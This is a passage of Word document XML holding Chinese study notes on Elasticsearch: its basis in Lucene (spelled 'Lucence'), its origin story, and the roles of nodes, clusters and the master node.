        <w:t>一种传统数据库很难实现的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005651C1" w:rsidRPr="00C22BC8" w:rsidRDefault="005651C1" w:rsidP="004B4B2E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>）概念与历史</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C62175" w:rsidRPr="00C22BC8" w:rsidRDefault="00C62175" w:rsidP="00B65CAE">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Lucence</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是当前功能最全的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>搜索引擎库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B592B" w:rsidRPr="00C22BC8" w:rsidRDefault="00C62175" w:rsidP="00B65CAE">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是一种</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Lucence</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>分布式实时搜索引擎</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，通过</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>restful API</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>来隐藏</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Lucence</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的复杂性，让全文搜索变得简单。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4B2E" w:rsidRPr="00C22BC8" w:rsidRDefault="00467EE5" w:rsidP="00F72FA5">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>分布式的实时文件存储，每个字段都被索引并可被搜索</w:t>
      </w:r>
      <w:r w:rsidR="00143ED3" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4B2E" w:rsidRPr="00C22BC8" w:rsidRDefault="00467EE5" w:rsidP="00F72FA5">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>分布式的实时分析搜索引擎</w:t>
      </w:r>
      <w:r w:rsidR="00143ED3" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4B2E" w:rsidRPr="00C22BC8" w:rsidRDefault="00467EE5" w:rsidP="00F72FA5">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>可以扩展到上百台服务器，处理</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PB</w:t>
      </w:r>
      <w:r w:rsidR="004B4B2E" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>级结构化或非结构化数据</w:t>
      </w:r>
      <w:r w:rsidR="00312138" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4B2E" w:rsidRPr="00C22BC8" w:rsidRDefault="007F580B" w:rsidP="0093378B">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>有一个叫</w:t>
      </w:r>
      <w:r w:rsidR="00A518A6" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>巴农程序员</w:t>
      </w:r>
      <w:r w:rsidR="00EF739D" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，结婚之后失业</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，妻子要去伦敦学习厨师，他也去了，给他做了一个搜索食谱的搜索引擎</w:t>
      </w:r>
      <w:r w:rsidR="00E1699B" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，构建了</w:t>
      </w:r>
      <w:r w:rsidR="00E1699B" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lucence</w:t>
      </w:r>
      <w:r w:rsidR="00E1699B" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，简化难度</w:t>
      </w:r>
      <w:r w:rsidR="00E1699B" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Compass</w:t>
      </w:r>
      <w:r w:rsidR="00753414" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，再到</w:t>
      </w:r>
      <w:r w:rsidR="00753414" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="00753414" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00680CFE" w:rsidRPr="00C22BC8" w:rsidRDefault="00680CFE" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>节点与集群</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2841" w:rsidRPr="00C22BC8" w:rsidRDefault="00680CFE" w:rsidP="008C2841">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>节点：运行一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的实例</w:t>
      </w:r>
      <w:r w:rsidR="00C72BE5" w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>集群：具有相同的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>cluster.name</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2841" w:rsidRPr="00C22BC8" w:rsidRDefault="008C2841" w:rsidP="008C2841">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>集群中一个节点会被选举为</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>主节点</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(master)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22BC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>它将临时管理集群级别的一些变更，例如新建或删除索引、增加或移除节点等。主节点不参与文档级别的变更或搜索，这意味着在流量增长的时候，该主节点不会成为集群的瓶颈。任何节点都可以成为主节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00680CFE" w:rsidRPr="00F41A4C" w:rsidRDefault="00680CFE" w:rsidP="004E5E1E">
      <w:pPr>
        <w:ind w:left="300" w:firstLineChars="300" w:firstLine="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00893828" w:rsidRPr="00F41A4C" w:rsidRDefault="00893828" w:rsidP="004E5E1E">
      <w:pPr>
        <w:ind w:left="300" w:firstLineChars="250" w:firstLine="375"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
